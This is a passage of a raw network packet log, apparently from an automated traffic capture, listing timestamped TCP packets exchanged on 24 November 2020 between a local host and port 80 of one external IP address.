                                                                                                                                                    Nov 24, 2020 20:34:43.640508890 CET804974047.241.19.44192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:34:43.640522003 CET4974080192.168.2.447.241.19.44
                                                                                                                                                    Nov 24, 2020 20:34:43.640547037 CET4974080192.168.2.447.241.19.44
                                                                                                                                                    Nov 24, 2020 20:34:43.679020882 CET804974047.241.19.44192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:34:43.679048061 CET804974047.241.19.44192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:34:43.679068089 CET804974047.241.19.44192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:34:43.679085016 CET804974047.241.19.44192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:34:43.679090977 CET4974080192.168.2.447.241.19.44
                                                                                                                                                    Nov 24, 2020 20:34:43.679100990 CET804974047.241.19.44192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:34:43.679116964 CET804974047.241.19.44192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:34:43.679122925 CET4974080192.168.2.447.241.19.44
                                                                                                                                                    Nov 24, 2020 20:34:43.679132938 CET804974047.241.19.44192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:34:43.679147959 CET804974047.241.19.44192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:34:43.679164886 CET804974047.241.19.44192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:34:43.679167032 CET4974080192.168.2.447.241.19.44
                                                                                                                                                    Nov 24, 2020 20:34:43.679195881 CET4974080192.168.2.447.241.19.44
                                                                                                                                                    Nov 24, 2020 20:34:43.719564915 CET804974047.241.19.44192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:34:43.719641924 CET4974080192.168.2.447.241.19.44
                                                                                                                                                    Nov 24, 2020 20:34:43.841094017 CET804974047.241.19.44192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:34:43.841156006 CET804974047.241.19.44192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:34:43.841192961 CET804974047.241.19.44192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:34:43.841227055 CET804974047.241.19.44192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:34:43.841260910 CET804974047.241.19.44192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:34:43.841267109 CET4974080192.168.2.447.241.19.44
                                                                                                                                                    Nov 24, 2020 20:34:43.841291904 CET4974080192.168.2.447.241.19.44
                                                                                                                                                    Nov 24, 2020 20:34:43.841306925 CET804974047.241.19.44192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:34:43.841331959 CET4974080192.168.2.447.241.19.44
                                                                                                                                                    Nov 24, 2020 20:34:43.841346025 CET804974047.241.19.44192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:34:43.841361046 CET4974080192.168.2.447.241.19.44
                                                                                                                                                    Nov 24, 2020 20:34:43.841379881 CET804974047.241.19.44192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:34:43.841392040 CET4974080192.168.2.447.241.19.44
                                                                                                                                                    Nov 24, 2020 20:34:43.841445923 CET4974080192.168.2.447.241.19.44
                                                                                                                                                    Nov 24, 2020 20:34:43.841455936 CET804974047.241.19.44192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:34:43.841492891 CET804974047.241.19.44192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:34:43.841495991 CET4974080192.168.2.447.241.19.44
                                                                                                                                                    Nov 24, 2020 20:34:43.841526985 CET804974047.241.19.44192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:34:43.841531038 CET4974080192.168.2.447.241.19.44
                                                                                                                                                    Nov 24, 2020 20:34:43.841569901 CET804974047.241.19.44192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:34:43.841573000 CET4974080192.168.2.447.241.19.44
                                                                                                                                                    Nov 24, 2020 20:34:43.841619968 CET4974080192.168.2.447.241.19.44
                                                                                                                                                    Nov 24, 2020 20:34:43.879797935 CET804974047.241.19.44192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:34:43.879828930 CET804974047.241.19.44192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:34:43.879842997 CET804974047.241.19.44192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:34:43.879854918 CET804974047.241.19.44192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:34:43.879873037 CET804974047.241.19.44192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:34:43.879889965 CET4974080192.168.2.447.241.19.44
                                                                                                                                                    Nov 24, 2020 20:34:43.879892111 CET804974047.241.19.44192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:34:43.879910946 CET804974047.241.19.44192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:34:43.879926920 CET804974047.241.19.44192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:34:43.879944086 CET4974080192.168.2.447.241.19.44
                                                                                                                                                    Nov 24, 2020 20:34:43.879944086 CET804974047.241.19.44192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:34:43.879960060 CET804974047.241.19.44192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:34:43.880006075 CET4974080192.168.2.447.241.19.44
                                                                                                                                                    Nov 24, 2020 20:34:43.917443037 CET804974047.241.19.44192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:34:43.917593956 CET4974080192.168.2.447.241.19.44
                                                                                                                                                    Nov 24, 2020 20:34:44.041749001 CET804974047.241.19.44192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:34:44.041805983 CET804974047.241.19.44192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:34:44.041842937 CET804974047.241.19.44192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:34:44.041889906 CET804974047.241.19.44192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:34:44.041908026 CET4974080192.168.2.447.241.19.44
                                                                                                                                                    Nov 24, 2020 20:34:44.041929960 CET4974080192.168.2.447.241.19.44
                                                                                                                                                    Nov 24, 2020 20:34:44.041944027 CET804974047.241.19.44192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:34:44.041965961 CET4974080192.168.2.447.241.19.44
                                                                                                                                                    Nov 24, 2020 20:34:44.041981936 CET804974047.241.19.44192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:34:44.041994095 CET4974080192.168.2.447.241.19.44
                                                                                                                                                    Nov 24, 2020 20:34:44.042023897 CET4974080192.168.2.447.241.19.44
                                                                                                                                                    Nov 24, 2020 20:34:44.042028904 CET804974047.241.19.44192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:34:44.042069912 CET804974047.241.19.44192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:34:44.042073965 CET4974080192.168.2.447.241.19.44
                                                                                                                                                    Nov 24, 2020 20:34:44.042108059 CET804974047.241.19.44192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:34:44.042112112 CET4974080192.168.2.447.241.19.44
                                                                                                                                                    Nov 24, 2020 20:34:44.042145967 CET804974047.241.19.44192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:34:44.042155981 CET4974080192.168.2.447.241.19.44
                                                                                                                                                    Nov 24, 2020 20:34:44.042176962 CET4974080192.168.2.447.241.19.44
                                                                                                                                                    Nov 24, 2020 20:34:44.042182922 CET804974047.241.19.44192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:34:44.042221069 CET804974047.241.19.44192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:34:44.042224884 CET4974080192.168.2.447.241.19.44
                                                                                                                                                    Nov 24, 2020 20:34:44.042257071 CET4974080192.168.2.447.241.19.44
                                                                                                                                                    Nov 24, 2020 20:34:44.080488920 CET804974047.241.19.44192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:34:44.080529928 CET804974047.241.19.44192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:34:44.080560923 CET804974047.241.19.44192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:34:44.080586910 CET804974047.241.19.44192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:34:44.080610991 CET804974047.241.19.44192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:34:44.080634117 CET4974080192.168.2.447.241.19.44
                                                                                                                                                    Nov 24, 2020 20:34:44.080636024 CET804974047.241.19.44192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:34:44.080661058 CET804974047.241.19.44192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:34:44.080684900 CET4974080192.168.2.447.241.19.44
                                                                                                                                                    Nov 24, 2020 20:34:44.080698013 CET4974080192.168.2.447.241.19.44
                                                                                                                                                    Nov 24, 2020 20:34:44.094454050 CET4974080192.168.2.447.241.19.44
                                                                                                                                                    Nov 24, 2020 20:34:44.202896118 CET4973980192.168.2.447.241.19.44
                                                                                                                                                    Nov 24, 2020 20:34:44.371494055 CET804974047.241.19.44192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:34:44.527932882 CET804973947.241.19.44192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:34:44.988176107 CET804973947.241.19.44192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:34:44.988313913 CET4973980192.168.2.447.241.19.44
                                                                                                                                                    Nov 24, 2020 20:34:44.992175102 CET4973980192.168.2.447.241.19.44
                                                                                                                                                    Nov 24, 2020 20:34:45.274055004 CET804973947.241.19.44192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:35:27.326159954 CET4976480192.168.2.447.241.19.44
                                                                                                                                                    Nov 24, 2020 20:35:27.326174021 CET4976580192.168.2.447.241.19.44
                                                                                                                                                    Nov 24, 2020 20:35:27.596864939 CET804976547.241.19.44192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:35:27.596988916 CET4976580192.168.2.447.241.19.44
                                                                                                                                                    Nov 24, 2020 20:35:27.597156048 CET804976447.241.19.44192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:35:27.597229958 CET4976480192.168.2.447.241.19.44
                                                                                                                                                    Nov 24, 2020 20:35:27.597718000 CET4976580192.168.2.447.241.19.44
                                                                                                                                                    Nov 24, 2020 20:35:27.909687042 CET804976547.241.19.44192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:35:28.619273901 CET804976547.241.19.44192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:35:28.619333029 CET804976547.241.19.44192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:35:28.619370937 CET804976547.241.19.44192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:35:28.619410038 CET804976547.241.19.44192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:35:28.619446039 CET804976547.241.19.44192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:35:28.619493008 CET804976547.241.19.44192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:35:28.619674921 CET4976580192.168.2.447.241.19.44
                                                                                                                                                    Nov 24, 2020 20:35:28.619749069 CET4976580192.168.2.447.241.19.44
                                                                                                                                                    Nov 24, 2020 20:35:28.662935972 CET804976547.241.19.44192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:35:28.662992001 CET804976547.241.19.44192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:35:28.663031101 CET804976547.241.19.44192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:35:28.663069010 CET804976547.241.19.44192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:35:28.663197994 CET4976580192.168.2.447.241.19.44
                                                                                                                                                    Nov 24, 2020 20:35:28.663243055 CET4976580192.168.2.447.241.19.44
                                                                                                                                                    Nov 24, 2020 20:35:28.891160011 CET804976547.241.19.44192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:35:28.891213894 CET804976547.241.19.44192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:35:28.891252995 CET804976547.241.19.44192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:35:28.891277075 CET4976580192.168.2.447.241.19.44
                                                                                                                                                    Nov 24, 2020 20:35:28.891292095 CET804976547.241.19.44192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:35:28.891316891 CET4976580192.168.2.447.241.19.44
                                                                                                                                                    Nov 24, 2020 20:35:28.891340017 CET804976547.241.19.44192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:35:28.891382933 CET804976547.241.19.44192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:35:28.891400099 CET4976580192.168.2.447.241.19.44
                                                                                                                                                    Nov 24, 2020 20:35:28.891421080 CET804976547.241.19.44192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:35:28.891458988 CET804976547.241.19.44192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:35:28.891474962 CET4976580192.168.2.447.241.19.44
                                                                                                                                                    Nov 24, 2020 20:35:28.891496897 CET804976547.241.19.44192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:35:28.891534090 CET804976547.241.19.44192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:35:28.891540051 CET4976580192.168.2.447.241.19.44
                                                                                                                                                    Nov 24, 2020 20:35:28.891571999 CET804976547.241.19.44192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:35:28.891587019 CET4976580192.168.2.447.241.19.44
                                                                                                                                                    Nov 24, 2020 20:35:28.891609907 CET804976547.241.19.44192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:35:28.891649961 CET4976580192.168.2.447.241.19.44
                                                                                                                                                    Nov 24, 2020 20:35:28.891721964 CET4976580192.168.2.447.241.19.44
                                                                                                                                                    Nov 24, 2020 20:35:28.934607029 CET804976547.241.19.44192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:35:28.934664011 CET804976547.241.19.44192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:35:28.934686899 CET4976580192.168.2.447.241.19.44
                                                                                                                                                    Nov 24, 2020 20:35:28.934708118 CET804976547.241.19.44192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:35:28.934732914 CET4976580192.168.2.447.241.19.44
                                                                                                                                                    Nov 24, 2020 20:35:28.934746981 CET804976547.241.19.44192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:35:28.934775114 CET4976580192.168.2.447.241.19.44
                                                                                                                                                    Nov 24, 2020 20:35:28.934788942 CET804976547.241.19.44192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:35:28.934794903 CET4976580192.168.2.447.241.19.44
                                                                                                                                                    Nov 24, 2020 20:35:28.934838057 CET804976547.241.19.44192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:35:28.934842110 CET4976580192.168.2.447.241.19.44
                                                                                                                                                    Nov 24, 2020 20:35:28.934885979 CET4976580192.168.2.447.241.19.44
                                                                                                                                                    Nov 24, 2020 20:35:28.938534975 CET804976547.241.19.44192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:35:28.938580036 CET804976547.241.19.44192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:35:28.938623905 CET4976580192.168.2.447.241.19.44
                                                                                                                                                    Nov 24, 2020 20:35:28.938652039 CET4976580192.168.2.447.241.19.44
                                                                                                                                                    Nov 24, 2020 20:35:29.162373066 CET804976547.241.19.44192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:35:29.162430048 CET804976547.241.19.44192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:35:29.162468910 CET804976547.241.19.44192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:35:29.162517071 CET804976547.241.19.44192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:35:29.162559032 CET804976547.241.19.44192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:35:29.162580013 CET4976580192.168.2.447.241.19.44
                                                                                                                                                    Nov 24, 2020 20:35:29.162595034 CET804976547.241.19.44192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:35:29.162633896 CET804976547.241.19.44192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:35:29.162671089 CET804976547.241.19.44192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:35:29.162677050 CET4976580192.168.2.447.241.19.44
                                                                                                                                                    Nov 24, 2020 20:35:29.162708044 CET804976547.241.19.44192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:35:29.162734032 CET4976580192.168.2.447.241.19.44
                                                                                                                                                    Nov 24, 2020 20:35:29.162744999 CET804976547.241.19.44192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:35:29.162782907 CET804976547.241.19.44192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:35:29.162812948 CET4976580192.168.2.447.241.19.44
                                                                                                                                                    Nov 24, 2020 20:35:29.162832022 CET804976547.241.19.44192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:35:29.162874937 CET804976547.241.19.44192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:35:29.162908077 CET4976580192.168.2.447.241.19.44
                                                                                                                                                    Nov 24, 2020 20:35:29.162913084 CET804976547.241.19.44192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:35:29.162950993 CET804976547.241.19.44192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:35:29.162961006 CET4976580192.168.2.447.241.19.44
                                                                                                                                                    Nov 24, 2020 20:35:29.162988901 CET804976547.241.19.44192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:35:29.163027048 CET804976547.241.19.44192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:35:29.163037062 CET4976580192.168.2.447.241.19.44
                                                                                                                                                    Nov 24, 2020 20:35:29.163065910 CET804976547.241.19.44192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:35:29.163103104 CET804976547.241.19.44192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:35:29.163115978 CET4976580192.168.2.447.241.19.44
                                                                                                                                                    Nov 24, 2020 20:35:29.163144112 CET804976547.241.19.44192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:35:29.163182020 CET4976580192.168.2.447.241.19.44
                                                                                                                                                    Nov 24, 2020 20:35:29.163228989 CET4976580192.168.2.447.241.19.44
                                                                                                                                                    Nov 24, 2020 20:35:29.219923973 CET804976547.241.19.44192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:35:29.219988108 CET804976547.241.19.44192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:35:29.220027924 CET804976547.241.19.44192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:35:29.220066071 CET804976547.241.19.44192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:35:29.220103979 CET804976547.241.19.44192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:35:29.220105886 CET4976580192.168.2.447.241.19.44
                                                                                                                                                    Nov 24, 2020 20:35:29.220139980 CET804976547.241.19.44192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:35:29.220141888 CET4976580192.168.2.447.241.19.44
                                                                                                                                                    Nov 24, 2020 20:35:29.220148087 CET4976580192.168.2.447.241.19.44
                                                                                                                                                    Nov 24, 2020 20:35:29.220170975 CET4976580192.168.2.447.241.19.44
                                                                                                                                                    Nov 24, 2020 20:35:29.220179081 CET804976547.241.19.44192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:35:29.220196009 CET4976580192.168.2.447.241.19.44
                                                                                                                                                    Nov 24, 2020 20:35:29.220215082 CET804976547.241.19.44192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:35:29.220237017 CET4976580192.168.2.447.241.19.44
                                                                                                                                                    Nov 24, 2020 20:35:29.220263004 CET4976580192.168.2.447.241.19.44
                                                                                                                                                    Nov 24, 2020 20:35:29.220264912 CET804976547.241.19.44192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:35:29.220309019 CET804976547.241.19.44192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:35:29.220318079 CET4976580192.168.2.447.241.19.44
                                                                                                                                                    Nov 24, 2020 20:35:29.220346928 CET804976547.241.19.44192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:35:29.220360994 CET4976580192.168.2.447.241.19.44
                                                                                                                                                    Nov 24, 2020 20:35:29.220402002 CET4976580192.168.2.447.241.19.44
                                                                                                                                                    Nov 24, 2020 20:35:29.263617039 CET804976547.241.19.44192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:35:29.263659000 CET804976547.241.19.44192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:35:29.263679028 CET804976547.241.19.44192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:35:29.263711929 CET804976547.241.19.44192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:35:29.263722897 CET4976580192.168.2.447.241.19.44
                                                                                                                                                    Nov 24, 2020 20:35:29.263736010 CET804976547.241.19.44192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:35:29.263756990 CET804976547.241.19.44192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:35:29.263758898 CET4976580192.168.2.447.241.19.44
                                                                                                                                                    Nov 24, 2020 20:35:29.263784885 CET804976547.241.19.44192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:35:29.263792992 CET4976580192.168.2.447.241.19.44
                                                                                                                                                    Nov 24, 2020 20:35:29.263807058 CET4976580192.168.2.447.241.19.44
                                                                                                                                                    Nov 24, 2020 20:35:29.263823032 CET804976547.241.19.44192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:35:29.263842106 CET4976580192.168.2.447.241.19.44
                                                                                                                                                    Nov 24, 2020 20:35:29.263876915 CET4976580192.168.2.447.241.19.44
                                                                                                                                                    Nov 24, 2020 20:35:29.419821024 CET804976547.241.19.44192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:35:29.420109987 CET4976580192.168.2.447.241.19.44
                                                                                                                                                    Nov 24, 2020 20:35:29.433650017 CET804976547.241.19.44192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:35:29.433672905 CET804976547.241.19.44192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:35:29.433685064 CET804976547.241.19.44192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:35:29.433697939 CET804976547.241.19.44192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:35:29.433716059 CET804976547.241.19.44192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:35:29.433728933 CET804976547.241.19.44192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:35:29.433742046 CET804976547.241.19.44192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:35:29.433753014 CET804976547.241.19.44192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:35:29.433765888 CET804976547.241.19.44192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:35:29.433778048 CET804976547.241.19.44192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:35:29.433789015 CET804976547.241.19.44192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:35:29.433799028 CET804976547.241.19.44192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:35:29.433880091 CET4976580192.168.2.447.241.19.44
                                                                                                                                                    Nov 24, 2020 20:35:29.433943033 CET4976580192.168.2.447.241.19.44
                                                                                                                                                    Nov 24, 2020 20:35:29.491049051 CET804976547.241.19.44192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:35:29.491076946 CET804976547.241.19.44192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:35:29.491092920 CET804976547.241.19.44192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:35:29.491108894 CET804976547.241.19.44192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:35:29.491118908 CET4976580192.168.2.447.241.19.44
                                                                                                                                                    Nov 24, 2020 20:35:29.491125107 CET804976547.241.19.44192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:35:29.491141081 CET804976547.241.19.44192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:35:29.491156101 CET4976580192.168.2.447.241.19.44
                                                                                                                                                    Nov 24, 2020 20:35:29.491161108 CET804976547.241.19.44192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:35:29.491178989 CET804976547.241.19.44192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:35:29.491179943 CET4976580192.168.2.447.241.19.44
                                                                                                                                                    Nov 24, 2020 20:35:29.491189957 CET4976580192.168.2.447.241.19.44
                                                                                                                                                    Nov 24, 2020 20:35:29.491194010 CET804976547.241.19.44192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:35:29.491225004 CET4976580192.168.2.447.241.19.44
                                                                                                                                                    Nov 24, 2020 20:35:29.491249084 CET4976580192.168.2.447.241.19.44
                                                                                                                                                    Nov 24, 2020 20:35:29.620631933 CET804976547.241.19.44192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:35:29.620662928 CET804976547.241.19.44192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:35:29.620686054 CET804976547.241.19.44192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:35:29.620697975 CET804976547.241.19.44192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:35:29.620709896 CET804976547.241.19.44192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:35:29.620724916 CET804976547.241.19.44192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:35:29.620738983 CET804976547.241.19.44192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:35:29.620754957 CET804976547.241.19.44192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:35:29.620769024 CET804976547.241.19.44192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:35:29.620785952 CET804976547.241.19.44192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:35:29.620801926 CET804976547.241.19.44192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:35:29.620908022 CET4976580192.168.2.447.241.19.44
                                                                                                                                                    Nov 24, 2020 20:35:29.620954990 CET4976580192.168.2.447.241.19.44
                                                                                                                                                    Nov 24, 2020 20:35:29.661693096 CET804976547.241.19.44192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:35:29.661922932 CET4976580192.168.2.447.241.19.44
                                                                                                                                                    Nov 24, 2020 20:35:29.664267063 CET804976547.241.19.44192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:35:29.664288044 CET804976547.241.19.44192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:35:29.664299011 CET804976547.241.19.44192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:35:29.664309978 CET804976547.241.19.44192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:35:29.664321899 CET804976547.241.19.44192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:35:29.664333105 CET804976547.241.19.44192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:35:29.664344072 CET804976547.241.19.44192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:35:29.664355993 CET804976547.241.19.44192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:35:29.664366007 CET804976547.241.19.44192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:35:29.664541006 CET4976580192.168.2.447.241.19.44
                                                                                                                                                    Nov 24, 2020 20:35:29.664578915 CET4976580192.168.2.447.241.19.44
                                                                                                                                                    Nov 24, 2020 20:35:29.690763950 CET804976547.241.19.44192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:35:29.691049099 CET4976580192.168.2.447.241.19.44
                                                                                                                                                    Nov 24, 2020 20:35:29.821516991 CET804976547.241.19.44192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:35:29.821542025 CET804976547.241.19.44192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:35:29.821558952 CET804976547.241.19.44192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:35:29.821588993 CET804976547.241.19.44192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:35:29.821595907 CET804976547.241.19.44192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:35:29.821607113 CET804976547.241.19.44192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:35:29.821611881 CET804976547.241.19.44192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:35:29.821625948 CET804976547.241.19.44192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:35:29.821640968 CET804976547.241.19.44192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:35:29.821652889 CET804976547.241.19.44192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:35:29.821666002 CET804976547.241.19.44192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:35:29.821683884 CET804976547.241.19.44192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:35:29.821748972 CET4976580192.168.2.447.241.19.44
                                                                                                                                                    Nov 24, 2020 20:35:29.821798086 CET4976580192.168.2.447.241.19.44
                                                                                                                                                    Nov 24, 2020 20:35:29.864618063 CET804976547.241.19.44192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:35:29.864643097 CET804976547.241.19.44192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:35:29.864655018 CET804976547.241.19.44192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:35:29.864666939 CET804976547.241.19.44192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:35:29.864680052 CET804976547.241.19.44192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:35:29.864691973 CET804976547.241.19.44192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:35:29.864705086 CET804976547.241.19.44192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:35:29.864722013 CET804976547.241.19.44192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:35:29.864737988 CET804976547.241.19.44192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:35:29.864932060 CET4976580192.168.2.447.241.19.44
                                                                                                                                                    Nov 24, 2020 20:35:29.867996931 CET4976580192.168.2.447.241.19.44
                                                                                                                                                    Nov 24, 2020 20:35:29.891413927 CET804976547.241.19.44192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:35:29.891632080 CET4976580192.168.2.447.241.19.44
                                                                                                                                                    Nov 24, 2020 20:35:29.905818939 CET804976547.241.19.44192.168.2.4
